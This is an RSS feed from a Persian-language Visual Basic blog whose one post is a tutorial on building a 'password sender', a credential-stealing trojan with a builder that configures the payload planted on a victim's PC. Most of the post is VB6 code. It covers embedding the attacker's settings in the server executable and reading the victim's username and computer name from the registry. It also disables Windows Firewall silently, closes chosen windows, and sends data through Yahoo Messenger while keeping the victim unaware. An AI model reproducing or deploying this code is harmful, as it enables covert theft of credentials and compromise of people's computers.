<?xml version="1.0" encoding="utf-8" ?>
<rss version="2.0">
	<channel>
		<title><![CDATA[آموزش ویژوال بیسیک]]></title>
		<link>http://amozesheiranian.blogsky.com</link>
		<description><![CDATA[www.arash-soft.blogsky.com : وبلاگی طراح ومتفاوت(طراح انواع نرم افزارهای هک کیلاگر مهندسی بازی فلش کاربردی وغیره)]]></description>
		<language>fa</language>
		<generator>RSS Generated by BlogSky.com</generator>
		
			
				<item>
					<title><![CDATA[آموزش ساخت پسورد سندر با ویژوال بیسیک]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=68</link>
					<description><![CDATA[<P>اولا می خوام شما رو با تفاوت بین تروجان و پسورد سندر آشنا کنم. خیلی ها بین این دو تا تفاوت قائل نمی شن در صورتی که درست نیست و این دو از زمین تا آسمون با هم فرق دارن.</P>
<P>پسورد سندر نسبت به تروجان کد نویسی ساده تری داره و اصولا برای این نوشته میشه که یک سری پسورد های خاص رو برای نویسنده ش بفرسته ، مثلا پسورد مسنجرها یا چیزهایی از این قبیل. ولی بک تروجان علاوه براین کارها مهمترین چیزی رو که یک هکر می خواد رو براش میاره یعنی: دسترسی کامل به کامپیوتر قربانی . پس یه تروجان می تونه پسورد سندر و کیلاگر(کی لوگر!!) و خیلی چیزهای دیگه رو هم در خودش داشته باشه. من نمی تونم ادعا کنم که یک تروجان کامل نوشتم ولی پسورد سندری که من نوشتم نسبتا مناسب بود و کارش رو به خوبی انجام می داد( البته اگه ایرادتش رو نگم). پس باید بدونید که هدف من آشنا کردن شما با نحوه ی کد نویسی یک پسورد سندر در وی بی هست</P>
<P>ارتباط بین سرور و ادیت سرور:</P>
<P>خوب کسایی که نمی دونن بدونن که سرور همون فایلی هست که شما به کامپیوتر قربانی واردش می کنید و ادیت سرور تنظیمات این فایل رو انجام می ده. البته پی اس (از این به بعد به پسورد سندر می گم پی اس) هایی هم هستن که بدون ادیت سرور نوشت همی شن و اصولا در اختیار عموم قرار نمی گیرن (مثل کد PS1 در فولدر اصلی مقاله که کار یکی از پی اس نویسای معروف ایران هست و آموزشی هست) ولی خیلی ها دوست دارن پی اس با ادیت سرور بنویسین.</P>
<P>اصولا چند راه هست که این ارتباط رو برقرار کنید و نیازی به قرار دادن سورس سرور در ادیت سرور نیست. من یه راه رو معرفی می کنم که فهمش ساده تر هست و تو پی اس خودم ازش استفاده کردم. (اون راه های دیگه رو اگه دوست داشتید تو فولدر E/S Connection&nbsp;&nbsp; بررسی کنید که سورس کامل Toxic-Ps ،&nbsp; Toxic-Cv،&nbsp; PSGهست .) برای این کار ما به یک Property Bag&nbsp; نیاز داریم که اطلاعاتی که می خوایم تو سرور باشن رو توسط ادیت سرور خیلی راحت توش بذاریم. بعد هم سرور که اجرا شد اون اطلاعات رو می خونه و ازش استفاده می کنه! به همبن راحتی! (گفتن نه نوشتن) این اطلاعات میتونه هر چیزی باشه مثل آدرس ایمیلی که اطلاعات می خواهید به اونجا فرستاد هبشه و ازاین قبیل. خوب من این کدها رو پایین آوردم و می تونید بررسی کنید چجوری اطلاعات تو فایل سرور نوشته و توسط سرور خونده می شوند.</P>
<P>Edit Server:</P>
<P>&nbsp;</P>
<P>On Local Error GoTo errTrap</P>
<P>&nbsp;&nbsp;&nbsp; Dim BeginP As Long</P>
<P>&nbsp;&nbsp;&nbsp; Dim Bag As New PropertyBag</P>
<P>&nbsp;&nbsp;&nbsp; Dim Temp As Variant</P>
<P>&nbsp;&nbsp;&nbsp; Dim mahmoud() As Byte</P>
<P>&nbsp;&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp;&nbsp; Dim er As String</P>
<P>&nbsp;&nbsp;&nbsp; With Bag</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .WriteProperty "id", id.Text</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .WriteProperty "force", force.Value</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .WriteProperty "dial", dial.Value</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .WriteProperty "user", user.Value</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .WriteProperty "com", com.Value</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .WriteProperty "fire", fire.Value</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .WriteProperty "IP", ip.Value</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .WriteProperty "image", preview.Image1.Picture</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; . </P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp;&nbsp; End With</P>
<P>&nbsp;&nbsp;&nbsp; Open App.Path + "\" + "serv.exe" For Binary As #2</P>
<P>&nbsp;&nbsp;&nbsp; mahmoud = LoadResData(101, "CUSTOM")</P>
<P>&nbsp;&nbsp;&nbsp; Put #2, , mahmoud()</P>
<P>&nbsp;&nbsp;&nbsp; Close #2</P>
<P>&nbsp;</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp; FileCopy App.Path &amp; "\serv.exe", App.Path &amp; "\" &amp; SrvName.Text</P>
<P>&nbsp;&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp;&nbsp; Open App.Path &amp; "\" &amp; SrvName.Text For Binary As #1</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; BeginP = LOF(1)</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Temp = Bag.Contents</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Seek #1, LOF(1)</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Put #1, , Temp</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Put #1, , BeginP</P>
<P>&nbsp;&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp;&nbsp; Close #1</P>
<P>&nbsp; </P>
<P>&nbsp; </P>
<P>&nbsp; Kill App.Path + "\" + "serv.exe"</P>
<P>&nbsp; Exit Sub</P>
<P>&nbsp;</P>
<P>errTrap:</P>
<P>MsgBox Err.Description, vbCritical, "Error"</P>
<P>در اینجا تمام اطلاعات در یک Property Bag&nbsp; نوشته می شود و بعد هم می ره داخل سرور! </P>
<P>فقط باید بدونید که من ابتدا ریسورس فایل سرور رو داخل ادیت سرور قرار دادم. برای این کارابتدا از قسمت Add-in Manager&nbsp; ، VB6 Resource Editor رو فغال کنید .بعد رو&nbsp;&nbsp;&nbsp; کلیک کنید . حالا Add Custom Resource&nbsp; رو بزنید و فایل سرور رو انتخاب کنید.می تونید اسم این ریسورس رو هم عوض کنید البته من همون 101 رو به صورت پیشفرض انتخاب کردم.قسمتهایی هم که در کد بالا خط کشیدم مربوط به لود کردن همین ریسورس و تبدیل آن به فایل اجرایی است.</P>
<P>&nbsp;</P>
<P>حالا کدهای مربوط به سرور و نحوه ی خوندن اطلاعات رو بررسی می کنیم.</P>
<P>&nbsp;</P>
<P>Server:</P>
<P>On Local Error Resume Next</P>
<P>&nbsp;</P>
<P>&nbsp;&nbsp;&nbsp; Dim BeginP As Long</P>
<P>&nbsp;&nbsp;&nbsp; Dim Temp As Variant</P>
<P>&nbsp;&nbsp;&nbsp; Dim bArr() As Byte</P>
<P>&nbsp;</P>
<P>&nbsp;&nbsp;&nbsp; Open App.Path &amp; "\" &amp; App.EXEName &amp; ".exe" For Binary As #1</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Get #1, LOF(1) - 3, BeginP</P>
<P>&nbsp;</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Seek #1, BeginP</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Get #1, , Temp</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Arr = Temp</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Bag.Contents = Arr</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Bag.WriteProperty "LOF", LOF(1)</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Bag.WriteProperty "BeginPos", BeginPos</P>
<P>&nbsp;</P>
<P>&nbsp;&nbsp; Close #1</P>
<P>&nbsp;</P>
<P>&nbsp;&nbsp;&nbsp; With Bag</P>
<P>&nbsp;&nbsp;&nbsp; ID.Caption = .ReadProperty("id")</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp; FileNameInstall.Caption = .ReadProperty("filename")</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp; Username.Value = .ReadProperty("user")</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Computername.Value = .ReadProperty("com")</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Firewall.Value = .ReadProperty("fire")</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Rand.Enabled = .ReadProperty("rand")</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; .</P>
<P>.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </P>
<P>&nbsp;&nbsp;&nbsp; End With</P>
<P>&nbsp;</P>
<P>ساده بود نه؟ این کارا رو شما هم می تونید انجام بدید. در اینجا اطلاعات از داخل فایل سرور خونده می شود و بر اساس اون مثلا یک تایمر خاص فعال می شود یا یه چیزی مثل این.</P>
<P>خب می ریم سراغ قسمت اصلی که می خواهیم با هم کدهای مخرب رو بنویسیم. این بستگی داره به مهارت برنامه نویسی&nbsp; شما و استعداد شما در این زمینه.چون من هیچ وقت نمی تونم اون چیزی رو که دقیقا شما می خواهید بهتون بدم.پس اینجا با کدهای ساده به صورت دسته بندی شده می ریم جلو که خیلی هاشون تو اکثر پی اس ها استفاده&nbsp; می شن. من اگر بخوام طرز کار همشون رو بهتون خیلی طولانی می شه.پس اینو به خودتون واگذار می کنم. اول تموم توابع API&nbsp; لازم دارید رو به برنامه اضافه کنید تا مشکلی پیش نیاید.</P>
<P>(زیر اسم توابع API&nbsp; خط کشیدم).</P>
<P>_______________________________________</P>
<P>Public Function SysDir() As String</P>
<P>&nbsp; Dim SysPath As String</P>
<P>&nbsp; SysPath = String(255, vbNullChar)</P>
<P>&nbsp; GetSystemDirectory SysPath, 255</P>
<P>&nbsp; SysDir = Left(SysPath, InStr(SysPath, vbNullChar) - 1)</P>
<P>End Function</P>
<P>برگشتی این تابع مسیری تو مایه های C:\WINDOWS\System32&nbsp; هست!</P>
<P>_______________________________________</P>
<P>Public Property Get ReadKey(Value As String) As String</P>
<P>Dim B As Object</P>
<P>On Error Resume Next</P>
<P>Set B = CreateObject("wscript.shell")</P>
<P>r = B.RegRead(Value)</P>
<P>ReadKey = r</P>
<P>End Property</P>
<P>با این کد می تونید کلید های درون رجیستری رو بخونید که تو دو تابع بعدی ازشون استفاده کردم.</P>
<P>&nbsp;_______________________________________</P>
<P>Public Sub getuser()</P>
<P>Dim UserString As String</P>
<P>UserString = ReadKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName")</P>
<P>User.Text = Username</P>
<P>End Sub</P>
<P>با این روال می تونید یوزر نیم کاربری که به ویندوز لاگین کرده رو بدست بیارید .</P>
<P>_______________________________________</P>
<P>Public Sub getCom()</P>
<P>Dim CompName As String</P>
<P>CompName = ReadKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultDomainName")</P>
<P>com.Text = CompName</P>
<P>End Sub</P>
<P>با این روال می تونید کامپیوتر نیم قربانی رو بدست بیارید.</P>
<P>&nbsp;</P>
<P>_______________________________________</P>
<P>&nbsp;</P>
<P>Public Sub fire()</P>
<P>Dim objFireWall As Object</P>
<P>&nbsp;Set objFireWall = CreateObject("HNetCfg.FwMgr")</P>
<P>&nbsp;Set objpolicy = objFireWall.localpolicy.currentprofile</P>
<P>&nbsp;objpolicy.firewallenabled = False</P>
<P>End Sub</P>
<P>این روال تو اکثر پی اس ها استفاده شده ست و می تونه فایروال ویندوز رو غیر فعال کنه!</P>
<P>_______________________________________</P>
<P>Private Sub CheckW()</P>
<P>Dim hwnd As Long</P>
<P>Dim wn As String</P>
<P>wn = Space(255)</P>
<P>hwnd = GetForegroundWindow</P>
<P>Handle.Text = Str(hwnd)</P>
<P>whandle.text= hwnd</P>
<P>GetWindowText hwnd, wn, GetWindowTextLength(hwnd) + 1</P>
<P>title.Text = wn</P>
<P>End Sub</P>
<P>&nbsp;</P>
<P>Private sub close()</P>
<P>Dim I as integer</P>
<P>For i=0 to closelist.listCount-1</P>
<P>If closelist.list (i)=title.text then PostMessage whandle, WM_CLOSE, 0&amp;, 0&amp;</P>
<P>Next i</P>
<P>End sub</P>
<P>این دو تا کد با هم کار می کنن.یعنی روال اولی که باید درون یک تایمر باشه، پنجره ی فعال رو تشخیص میده و هندل و عنوان اون رو تو دو تا تکست باکس می ذاره و کد دوم هم هروقت پنجره ی مخصوصی که شما اسمش رو تو Closelist&nbsp; گذاشتید باز بشه، اون پنجره رو می بنده(این بستگی به شما داره که چجوری بخواهید اسامی پنجره ها رو وارد اون لیست باکس کنید.منظورم بر می گرده به قسمت چگونگی طراحی ادیت سرور).</P>
<P>_______________________________________</P>
<P>&nbsp;</P>
<P>ShellExecute Me.hwnd, "open", "ymsgr:sendIM?" + ID + "&amp;m=" + mess, 0&amp;, App.Path, 0&amp;</P>
<P>این همون کدی هست که باهاش می تونید توسط یاهو مسنجر مسیج برای یک آیدی خاص بفرستید (البته خیلی ابتداییه) .خب بازم این هنر شمایه که چجوری این پیام رو بفرستید که قربانی متوجه نشه. ضمنا بگم در صورتی این کد کارمی کنه که طرف با یاهو لاگین کرده باشه. وگرنه فقط یاهو باز می شه و طرف شک می کنه. همچنین باید بتونید این صفحه رو از دید قربانی مخفی نگه دارید چون همه چی واضح دیده می شه. ببینم چه میکنین!!</P>
<P>××××××××××××××××××××××××××××××××××</P>
<P>&nbsp;یک کد برای ارسال pm به یاهو 8:</P>
<P>کد:<BR>Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long<BR>Private Sub Command1_Click()<BR>ShellExecute Me.hwnd, "open", "ymsgr:sendIM?" + Text1.Text + "&amp;m=" + Text2.Text, 0&amp;, App.Path, 0&amp;<BR>SendKeys "{enter}"<BR>End Sub</P>
<P>&nbsp;***********************************</P>
<P>حالت کلی فرستادن pm به یا هو را من با این modul بهتون نشون می دم<BR>دیگه خودتون یکم دستکاریش کنین و تغییرش بدین:</P>
<P>حالت کلی فرستادن pm به یا هو را من با این modul بهتون نشون می دم<BR>دیگه خودتون یکم دستکاریش کنین و تغییرش بدین</P>
<P><BR>Public Declare Function SetForegroundWindow Lib "User32" (ByVal hwnd As Long) As Long<BR>Public Declare Function sndPlaySound Lib "winmm.dll" Alias "sndPlaySoundA" (ByVal lpszSoundName As String, ByVal uFlags As Long) As Long<BR>Public Const SND_ASYNC = &amp;H1<BR>Public Declare Function EnableWindow Lib "User32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long<BR>Public Declare Function FindWindow Lib "User32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long<BR>Public Declare Function FindWindowEx Lib "User32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long<BR>Public Declare Function GetMenuItemCount Lib "User32" (ByVal hMenu As Long) As Long<BR>Public Declare Function GetMenu Lib "User32" (ByVal hwnd As Long) As Long<BR>Declare Function GetCursorPos Lib "User32" (lpPoint As POINTAPI) As Long<BR>Public Declare Function GetMenuItemID Lib "User32" (ByVal hMenu As Long, ByVal nPos As Long) As Long<BR>Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long<BR>Public Declare Function GetMenuString Lib "User32" Alias "GetMenuStringA" (ByVal hMenu As Long, ByVal wIDItem As Long, ByVal lpString As String, ByVal nMaxCount As Long, ByVal wFlag As Long) As Long<BR>Public Declare Function GetSubMenu Lib "User32" (ByVal hMenu As Long, ByVal nPos As Long) As Long<BR>Public Declare Function GetWindow Lib "User32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long<BR>Public Declare Function PostMessage Lib "User32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long<BR>Public Declare Function SendMessage Lib "User32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long<BR>Public Declare Function SendMessageLong&amp; Lib "User32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)<BR>Public Declare Function SendMessageByString Lib "User32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long<BR>Public Declare Function SetWindowPos Lib "User32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long<BR>Public Declare Function ShowWindow Lib "User32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long<BR>Public Const BM_SETCHECK = &amp;HF1<BR>Public Const BM_GETCHECK = &amp;HF0<BR>Const HWND_TOPMOST = -1<BR>Const HWND_NOTOPMOST = -2<BR>Const SWP_NOSIZE = &amp;H1<BR>Const SWP_NOMOVE = &amp;H2<BR>Const SWP_NOACTIVATE = &amp;H10<BR>Const SWP_SHOWWINDOW = &amp;H40<BR>Private Declare Function Escape Lib "gdi32" (ByVal hdc As Long, _<BR>&nbsp;&nbsp;&nbsp;&nbsp; ByVal nEscape As Long, ByVal nCount As Long, lpInData As Any, _<BR>&nbsp;&nbsp;&nbsp;&nbsp; lpOutData As Any) As Long<BR>Private Declare Function DeleteDC Lib "gdi32" (ByVal hdc As Long) As Long<BR>Private Declare Function StretchBlt Lib "gdi32" (ByVal hdc As Long, _<BR>&nbsp;&nbsp;&nbsp;&nbsp; ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, _<BR>&nbsp;&nbsp;&nbsp;&nbsp; ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, _<BR>&nbsp;&nbsp;&nbsp;&nbsp; ByVal ySrc As Long, ByVal nSrcWidth As Long, _<BR>&nbsp;&nbsp;&nbsp;&nbsp; ByVal nSrcHeight As Long, ByVal dwRop As Long) As Long<BR>Private Declare Function SelectObject Lib "gdi32" (ByVal hdc As Long, _<BR>&nbsp;&nbsp;&nbsp;&nbsp; ByVal hObject As Long) As Long<BR>Private Declare Function CreateCompatibleDC Lib "gdi32" _<BR>&nbsp;&nbsp;&nbsp;&nbsp; (ByVal hdc As Long) As Long<BR>&nbsp;&nbsp;&nbsp; Private Declare Function SwapMouseButton&amp; Lib "User32" _<BR>(ByVal bSwap As Long)<BR>Private Declare Function ShowCursor&amp; Lib "User32" _<BR>(ByVal bShow As Long)<BR>&nbsp;&nbsp;&nbsp; Private Const WM_SYSCOMMAND = &amp;H112&amp;<BR>&nbsp;&nbsp;&nbsp; Private Const SC_MONITORPOWER = &amp;HF170&amp;<BR>&nbsp;&nbsp;&nbsp; Dim mousehide As Boolean<BR>&nbsp;&nbsp;&nbsp; Dim fliphorizontal As Boolean, flipvertical As Boolean, thechange&nbsp; 'declare the variables<BR>&nbsp;&nbsp;&nbsp; Dim hIn As Integer<BR>&nbsp;&nbsp;&nbsp; Dim Sending As Boolean, Sending2 As Boolean, stopit As Boolean<BR>Public Const EWX_FORCE = 4<BR>Public Const EWX_LOGOFF = 0<BR>Public Const EWX_REBOOT = 2<BR>Public Const EWX_SHUTDOWN = 1</P>
<P>Public Const CB_GETCOUNT = &amp;H146<BR>Public Const CB_GETLBTEXT = &amp;H148<BR>Public Const CB_SETCURSEL = &amp;H14E</P>
<P>Public Const GW_HWNDFIRST = 0<BR>Public Const GW_HWNDNEXT = 2<BR>Public Const GW_CHILD = 5</P>
<P>Public Const LB_GETCOUNT = &amp;H18B<BR>Public Const LB_GETTEXT = &amp;H189<BR>Public Const LB_SETCURSEL = &amp;H186</P>
<P>Public Const SW_HIDE = 0<BR>Public Const SW_MAXIMIZE = 3<BR>Public Const SW_MINIMIZE = 6<BR>Public Const SW_NORMAL = 1<BR>Public Const SW_SHOW = 5</P>
<P>Public Const VK_SPACE = &amp;H20</P>
<P>Public Const WM_CHAR = &amp;H102<BR>Public Const WM_CLOSE = &amp;H10<BR>Public Const WM_COMMAND = &amp;H111<BR>Public Const WM_GETTEXT = &amp;HD<BR>Public Const WM_GETTEXTLENGTH = &amp;HE<BR>Public Const WM_KEYDOWN = &amp;H100<BR>Public Const WM_KEYUP = &amp;H101<BR>Public Const WM_LBUTTONDBLCLK = &amp;H203<BR>Public Const WM_LBUTTONDOWN = &amp;H201<BR>Public Const WM_LBUTTONUP = &amp;H202<BR>Public Const WM_MOVE = &amp;HF012<BR>Public Const WM_RBUTTONDOWN = &amp;H204<BR>Public Const WM_RBUTTONUP = &amp;H205<BR>Public Const WM_SETTEXT = &amp;HC<BR>Public LastPoint As POINTAPI</P>
<P>Public lngTPPY As Long<BR>Public lngTPPX As Long</P>
<P>Type POINTAPI<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; X As Long<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Y As Long<BR>End Type</P>
<P>Sub SendPM(Who As String, Text As String)<BR>'oz RoOzY<BR>'Ex. : call SendPM("ngsp_public_msg","salam")</P>
<P>Dim imclass As Long, editx As Long<BR>imclass = FindWindow("imclass", vbNullString)<BR>editx = FindWindowEx(imclass, 0&amp;, "edit", vbNullString)<BR>Call SendMessageByString(editx, WM_SETTEXT, 0&amp;, Who)<BR>ChatSend (Text)<BR>End Sub<BR>Sub ChatSend(TheText)<BR>Dim imclass As Long<BR>Dim richedit As Long<BR>Dim Button As Long<BR>imclass&amp; = FindWindow("IMClass", vbNullString)<BR>richedit&amp; = FindWindowEx(imclass&amp;, 0&amp;, "RICHEDIT", vbNullString)<BR>Call SendMessageByString(richedit&amp;, WM_SETTEXT, 0&amp;, TheText)<BR>Button&amp; = FindWindowEx(imclass&amp;, 0&amp;, "Button", vbNullString)<BR>Button&amp; = FindWindowEx(imclass&amp;, Button&amp;, "Button", vbNullString)<BR>Button&amp; = FindWindowEx(imclass&amp;, Button&amp;, "Button", vbNullString)<BR>Button&amp; = FindWindowEx(imclass&amp;, Button&amp;, "Button", vbNullString)<BR>Call SendMessageLong(Button&amp;, WM_KEYDOWN, VK_SPACE, 0&amp;)<BR>Call SendMessageLong(Button&amp;, WM_KEYUP, VK_SPACE, 0&amp;)<BR>End Sub<BR>موفق باشی</P>]]></description>
					<pubDate>Mon, 28 Apr 2008 13:37:58 GMT</pubDate>
